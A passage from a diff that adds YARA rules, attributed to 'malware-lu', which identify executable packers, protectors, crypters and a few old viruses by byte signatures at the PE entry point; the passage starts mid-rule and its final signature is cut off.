+		$a0 = { 6A ?? 8B B5 ?? ?? ?? ?? C1 E6 04 8B 85 ?? ?? ?? ?? 25 07 ?? ?? 80 79 05 48 83 C8 F8 40 33 C9 8A 88 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 81 E2 07 ?? ?? 80 79 05 4A 83 CA F8 42 33 C0 8A 82 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TPACKv05cm1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 8E FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv271
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED B0 27 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TPACKv05cm2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 CE FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeJoiner10Yodaf2f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv101bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 44 56 FF 15 94 13 42 00 8B F0 B1 22 8A 06 3A C1 75 13 8A 46 01 46 3A C1 74 04 84 C0 75 F4 38 0E 75 0D 46 EB 0A 3C 20 7E 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinV11cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DotFixNiceProtectvna
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 55 00 00 00 8D BD 00 10 40 00 68 ?? ?? ?? 00 03 3C 24 8B F7 90 68 31 10 40 00 9B DB E3 55 DB 04 24 8B C7 DB 44 24 04 DE C1 DB 1C 24 8B 1C 24 66 AD 51 DB 04 24 90 90 DA 8D 77 10 40 00 DB 1C 24 D1 E1 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv032betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackItBitch10archphase
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 28 ?? ?? ?? 35 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 41 ?? ?? ?? 50 ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? ?? ?? 79 ?? ?? ?? 7D ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule JDPack2xJDPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 68 51 40 00 68 04 25 40 00 64 A1 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RPolyCryptv10personalpolycryptorsignfrompinch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 58 97 97 60 61 8B 04 24 80 78 F3 6A E8 00 00 00 00 58 E8 00 00 00 00 58 91 91 EB 00 0F 85 6B F4 76 6F E8 00 00 00 00 83 C4 04 E8 00 00 00 00 58 90 E8 00 00 00 00 83 C4 04 8B 04 24 80 78 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv031betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packmanv0001
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 8D A8 ?? ?? FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEPack099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239minimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E9 ?? ?? ?? FF 50 C1 C8 18 89 05 ?? ?? ?? ?? C3 C1 C0 18 51 E9 ?? ?? ?? FF 84 C0 0F 84 6A F9 FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF E8 CF E9 FF FF B8 01 00 00 00 E9 ?? ?? ?? FF 2B D0 68 A0 36 80 D4 59 81 C9 64 98 FF 99 E9 ?? ?? ?? FF 84 C0 0F 84 8E EC FF FF E9 ?? ?? ?? FF C3 87 3C 24 5F 8B 00 03 45 FC 83 C0 18 E9 ?? ?? ?? FF 87 0C 24 59 B8 01 00 00 00 D3 E0 23 D0 E9 02 18 00 00 0F 8D DB 00 00 00 C1 E8 14 E9 CA 00 00 00 9D 87 0C 24 59 87 1C 24 68 AE 73 B9 96 E9 C5 10 00 00 0F 8A ?? ?? ?? ?? E9 ?? ?? ?? FF 81 FD F5 FF 8F 07 E9 4F 10 00 00 C3 E9 5E 12 00 00 87 3C 24 E9 ?? ?? ?? FF E8 ?? ?? ?? FF 83 3D ?? ?? ?? ?? 00 0F 85 ?? ?? ?? ?? 8D 55 EC B8 ?? ?? ?? ?? E9 ?? ?? ?? FF E8 A7 1A 00 00 E8 2A CB FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF 59 89 45 E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC60ASM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HaspdongleAlladin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 53 51 52 57 56 8B 75 1C 8B 3E ?? ?? ?? ?? ?? 8B 5D 08 8A FB ?? ?? 03 5D 10 8B 45 0C 8B 4D 14 8B 55 18 80 FF 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SafeDiscv4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 42 6F 47 5F }
+
+condition:
+		$a0
+}
+	
+	
+rule PKLITEv112v115v1201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 73 ?? 2D ?? ?? FA 8E D0 FB 2D ?? ?? 8E C0 50 B9 ?? ?? 33 FF 57 BE ?? ?? FC F3 A5 CB B4 09 BA ?? ?? CD 21 CD 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv112v115v1202
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 3B C4 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorv153
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80 A1 C1 00 00 00 FE C3 31 C0 64 FF 30 64 89 20 CC C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv032afakeEXE32Pack13xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC 56 3B D2 74 02 81 85 57 E8 00 00 00 00 3B DB 74 01 90 83 C4 14 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXpressorv11CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 15 13 00 00 E9 F0 12 00 00 E9 58 12 00 00 E9 AF 0C 00 00 E9 AE 02 00 00 E9 B4 0B 00 00 E9 E0 0C 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV11LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivatePersonalPackerPPPv102ConquestOfTroycom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 17 00 00 00 E8 68 00 00 00 FF 35 2C 37 00 10 E8 ED 01 00 00 6A 00 E8 2E 04 00 00 E8 41 04 00 00 A3 74 37 00 10 6A 64 E8 5F 04 00 00 E8 30 04 00 00 A3 78 37 00 10 6A 64 E8 4E 04 00 00 E8 1F 04 00 00 A3 7C 37 00 10 A1 74 37 00 10 8B 1D 78 37 00 10 2B D8 8B 0D 7C 37 00 10 2B C8 83 FB 64 73 0F 81 F9 C8 00 00 00 73 07 6A 00 E8 D9 03 00 00 C3 6A 0A 6A 07 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxHorse1776
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5D 83 ?? ?? 06 1E 26 ?? ?? ?? ?? BF ?? ?? 1E 0E 1F 8B F7 01 EE B9 ?? ?? FC F3 A6 1F 1E 07 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEShit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DrWebVirusFindingEngineInSoftEDVSysteme
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 01 00 00 00 C2 0C 00 8D 80 00 00 00 00 8B D2 8B ?? 24 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PluginToExev100BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv15PrivateVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NeoLitev200
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 44 24 04 23 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 FE 05 ?? ?? ?? ?? 0B C0 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv200bextra
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 02 00 72 ?? B4 09 BA ?? ?? CD 21 B8 01 4C CD 21 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EA ?? ?? ?? ?? F3 A5 C3 59 2D ?? ?? 8E D0 51 2D ?? ?? 50 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Crunch5Fusion4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 15 03 ?? ?? ?? 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule MSLRHv032afakePEBundle023xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEMangle
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C BE ?? ?? ?? ?? 8B FE B9 ?? ?? ?? ?? BB 44 52 4F 4C AD 33 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv302v302av304Relocationspack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? 8C CD 81 ED ?? ?? 8B DD 81 EB ?? ?? 8B D3 FC FA 1E 8E DB 01 15 33 C0 2E AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXProtectorv10x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NorthStarPEShrinkerv13byLiuxingping
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 73 ?? FF FF 8B 06 83 F8 00 74 11 8D B5 7F ?? FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 4F ?? FF FF 2B D0 89 95 4F ?? FF FF 01 95 67 ?? FF FF 8D B5 83 ?? FF FF 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule CodeCryptv015b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 31 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117Ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB C4 84 40 ?? 87 DD 8B 85 49 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeASProtect10FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KGCryptvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 64 A1 30 ?? ?? ?? 84 C0 74 ?? 64 A1 20 ?? ?? ?? 0B C0 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxKBDflags1024
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC 2E 89 2E 24 03 BC 00 04 8C D5 2E 89 2E 22 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV102AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 23 3F 42 00 8B D5 81 C2 72 3F 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3A 66 42 00 81 E9 1D 40 42 00 8B D5 81 C2 1D 40 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 C3 1F 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1311ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC620Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 55 8B EC 83 EC 50 53 56 57 BE 90 90 90 90 8D 7D F4 A5 A5 66 A5 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MEGALITEv120a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 2D 73 ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GoatsMutilatorV16Goat_e0f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 EA 0B 00 00 ?? ?? ?? 8B 1C 79 F6 63 D8 8D 22 B0 BF F6 49 08 C3 02 BD 3B 6C 29 46 13 28 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo430aSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 41 4E 53 49 29 2C 20 61 70 70 20 73 74 72 69 6E 67 73 20 61 72 65 20 27 25 73 27 20 61 6E 64 20 27 25 73 27 00 00 00 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 55 4E 49 43 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv038betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 97 FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule DCryptPrivate09bdrmist
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? ?? 00 E8 00 00 00 00 58 68 ?? ?? ?? 00 83 E8 0B 0F 18 00 D0 00 48 E2 FB C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchyV02XRyd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? ?? 57 BE ?? ?? ?? ?? 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SkDUndetectabler3NoFSG2MethodSkD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 00 00 EB 0F 8B 8D F4 FD FF FF 83 C1 01 89 8D F4 FD FF FF 8B 95 F4 FD FF FF 3B 15 ?? 16 00 01 73 1C 8B 85 F4 FD FF FF 8B 0D ?? 16 00 01 8D 54 01 07 81 FA 74 10 00 01 75 02 EB 02 EB C7 8B 85 F4 FD FF FF 50 E8 ?? 00 00 00 83 C4 04 89 85 F0 FD FF FF 8B 8D F0 FD FF FF 89 4D FC C7 45 F8 00 00 00 00 EB 09 8B 55 F8 83 C2 01 89 55 F8 8B 45 F8 3B 85 F4 FD FF FF 73 15 8B 4D FC 03 4D F8 8B 15 ?? 16 00 01 03 55 F8 8A 02 88 01 EB D7 83 3D ?? 16 00 01 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTPacker10ErazerZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 E0 53 33 C0 89 45 E0 89 45 E4 89 45 E8 89 45 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 8D 4D EC BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FC FF FF 8B 55 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 8D 4D E8 BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FE FF FF 8B 55 E8 B8 ?? ?? 40 00 E8 ?? ?? FF FF B8 ?? ?? 40 00 E8 ?? FB FF FF 8B D8 A1 ?? ?? 40 00 BA ?? ?? 40 00 E8 ?? ?? FF FF 75 26 8B D3 A1 ?? ?? 40 00 E8 ?? ?? FF FF 84 C0 75 2A 8D 55 E4 33 C0 E8 ?? ?? FF FF 8B 45 E4 8B D3 E8 ?? ?? FF FF EB 14 8D 55 E0 33 C0 E8 ?? ?? FF FF 8B 45 E0 8B D3 E8 ?? ?? FF FF 6A 00 E8 ?? ?? FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? 40 00 8D 45 E0 BA 04 00 00 00 E8 ?? ?? FF FF C3 E9 ?? ?? FF FF EB EB 5B E8 ?? ?? FF FF 00 00 00 FF FF FF FF 01 00 00 00 25 00 00 00 FF FF FF FF 01 00 00 00 5C 00 00 00 FF FF FF FF 06 00 00 00 53 45 52 56 45 52 00 00 